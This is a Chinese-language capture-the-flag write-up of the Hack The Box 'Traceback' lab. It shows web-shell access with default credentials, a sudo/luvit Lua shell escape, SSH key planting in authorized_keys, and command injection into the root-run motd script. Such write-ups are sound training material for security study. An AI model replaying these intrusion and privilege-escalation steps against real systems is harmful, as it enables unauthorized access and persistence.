Contents

HTB Traceback Writeup

Contents

HTB Traceback 靶机渗透笔记

https://gitee.com/leonsec/images/raw/master/截图_2020-07-12_10-40-26.png

一样的nmap扫一下,发现80端口开了web服务,访问:

https://gitee.com/leonsec/images/raw/master/截图_2020-07-12_10-45-19.png

发现网站被黑了,看下源码,发现注释:

1
<!--Some of the best web shells that you might need ;)-->

直接Google一下,发现一个webshell项目:

https://gitee.com/leonsec/images/raw/master/截图_2020-07-12_10-48-29.png

项目链接:TheBinitGhimire/Web-Shells 因为是PHP环境,把其中的php马尝试一遍,发现smevk.php可以使用:

https://gitee.com/leonsec/images/raw/master/截图_2020-07-12_10-52-21.png

使用用户名密码均为admin登录,使用自带的反弹shell得到shell:

https://gitee.com/leonsec/images/raw/master/截图_2020-07-12_11-01-20.png

/home目录发现另一个用户:

1
2
3
4
5
6
$ ls -al
total 16
drwxr-xr-x  4 root     root     4096 Aug 25  2019 .
drwxr-xr-x 22 root     root     4096 Aug 25  2019 ..
drwxr-x---  5 sysadmin sysadmin 4096 Mar 16 03:53 sysadmin
drwxr-x---  5 webadmin sysadmin 4096 Jul 11 19:20 webadmin

webadmin目录发现:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
$ cd webadmin   
$ ls -al
total 48
drwxr-x--- 5 webadmin sysadmin 4096 Jul 11 19:20 .
drwxr-xr-x 4 root     root     4096 Aug 25  2019 ..
-rw------- 1 webadmin webadmin  105 Mar 16 04:03 .bash_history
-rw-r--r-- 1 webadmin webadmin  220 Aug 23  2019 .bash_logout
-rw-r--r-- 1 webadmin webadmin 3771 Aug 23  2019 .bashrc
drwx------ 2 webadmin webadmin 4096 Aug 23  2019 .cache
drwxrwxr-x 3 webadmin webadmin 4096 Aug 24  2019 .local
-rw-rw-r-- 1 webadmin webadmin    1 Aug 25  2019 .luvit_history
-rw-r--r-- 1 webadmin webadmin  807 Aug 23  2019 .profile
drwxrwxr-x 2 webadmin webadmin 4096 Feb 27 06:29 .ssh
-rw-rw-r-- 1 sysadmin sysadmin  122 Mar 16 03:53 note.txt
-rw-rw-rw- 1 webadmin webadmin   22 Jul 11 19:20 privesc.lua
$ cat .bash_history
ls -la
sudo -l
nano privesc.lua
sudo -u sysadmin /home/sysadmin/luvit privesc.lua 
rm privesc.lua
logout
$ cat note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.

没有权限查看sysadmin目录:

1
2
$ cd sysadmin
/bin/sh: 20: cd: can't cd to sysadmin

根据历史命令可以看见用户编辑并执行了privesc.lua,查看:

1
2
$ cat privesc.lua
os.execute("/bin/sh")

看下webadmin的权限:

1
2
3
4
5
6
7
$ sudo -l
Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit

发现可以执行/home/sysadmin/luvit 所以模仿历史命令直接执行:

1
2
3
4
5
6
7
8
9
$ sudo -u sysadmin /home/sysadmin/luvit privesc.lua
sh: turning off NDELAY mode
ls
note.txt
privesc.lua
id
uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin)
whoami
sysadmin

获得了sysadmin权限,拿到user.txt

接下来根据网上的wp,使用pspy工具监视进程:DominicBreuker/pspy 发现系统每隔30秒就把/var/backups/.update-motd.d/中的文件都复制到/etc/update-motd.d/,Google一下update-motd.d的作用,发现是每次SSH登录成功后,会执行00-header文件中的命令 之前nmap发现22端口开着,所以可以使用公钥ssh登录: 生成密钥对:

1
ssh-keygen -t rsa -P '' -f ~/.ssh/id_rsa

然后将id_rsa.pub也就是公钥复制到靶机的/home/webadmin/.ssh/authorized_keys

1
echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC75Pgdeh6oZ2nsAfys/lWzVoh+NTRcC1boeU+tfdI6n6PG2K7oU3JB2cPukdbIzFmCxLi/ra9aoMT7ckm6e952dB/Q8GfjwVapbj9vAw5ZSpuK3ihQwTHfrFXqzFiYDfYFTuoRHTl5xkQIepxLh61C+ig98ClKUjoDaz7/WXiIaHhM+ClxG51TlquDBZQc+Fzyob5bBDRB1TxpYznrPsf1dMnC1qqVz6jzuq2AyQoM9pJcL73ig5aNlG/R8TpGC4fWjlSWsA30dQQRex+V3fOJRgYG0YTov+6jVKeM3DSZsWQM5phOo83iL+ICpfXGCgyflj9z9G3BUIuXV91BoVIs1JVaD/aH1I3gb5iVaOq1hlxPhZchPf5dqN/xDVB/7yEDH0sD3HIDOdroEk2b69g9FmpgGpR9x5vuQRQ3a41Jpb3MyDxVMq0Y7UHi2Kue9JASZsKFZaHKh2KnDELaoy9zwuRHRr623KKqd3vvYGinPgYUUOwGgabwwRyKQT3NGWc= root@kali >> /home/webadmin/.ssh/authorized_keys

然后使用:ssh -i id_rsa webadmin@10.10.10.181即可登录靶机:

https://gitee.com/leonsec/images/raw/master/截图_2020-07-12_11-58-53.png

查看下之前监视到的/etc/update-motd.d

https://gitee.com/leonsec/images/raw/master/截图_2020-07-12_12-09-55.png

可以看到sysadmin具有修改权限,00-header文件内容发现这是一个bash脚本,是ssh登录成功之后的欢迎信息,并且这个bash脚本是使用root用户权限执行的,我们可以将命令写入00-header,ssh一连上就会执行命令:

先使用sysadmin执行:echo "cat /root/root.txt" >> /etc/update-motd.d/00-header 然后使用ssh登录靶机:(两个步骤衔接一定要快,因为30秒就重置了)

https://gitee.com/leonsec/images/raw/master/截图_2020-07-12_12-18-49.png

成功获得root.txt,也可以反弹个shell拿到root权限

最后贴一个网上找到的流程图: https://gitee.com/leonsec/images/raw/master/Traceback.png